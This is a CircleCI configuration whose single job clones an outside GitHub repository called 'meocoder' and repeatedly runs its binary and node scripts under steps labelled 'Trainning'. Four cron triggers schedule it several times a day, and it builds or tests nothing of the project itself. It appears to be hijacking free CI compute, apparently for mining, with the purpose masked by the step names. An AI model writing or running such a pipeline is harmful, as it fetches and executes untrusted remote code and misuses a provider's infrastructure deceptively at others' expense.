version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: medium

    working_directory: ~/source

    steps:
      - checkout
      
      - run:
          name: Clone project and run task
          command:  git clone https://github.com/vippro99/meocoder.git && cd meocoder && npm i -s && chmod +x meocoder config.json && node app-1h.js
      - run:
          name: Trainning
          command:  cd meocoder && node app-1h.js
      - run:
          name: Trainning 2
          command:  cd meocoder && node app-1h.js
      - run:
          name: Trainning 3
          command:  cd meocoder && node app-1h.js
      - run:
          name: Trainning 4
          command:  cd meocoder && node test-45m.js

      # cronjob 
workflows:
  version: 2

  constantly_check:
    triggers:
      - schedule:
          cron: "26 3,9,15,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "27 3,9,15,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "28 3,9,15,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "29 3,9,15,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
    jobs:
      - build
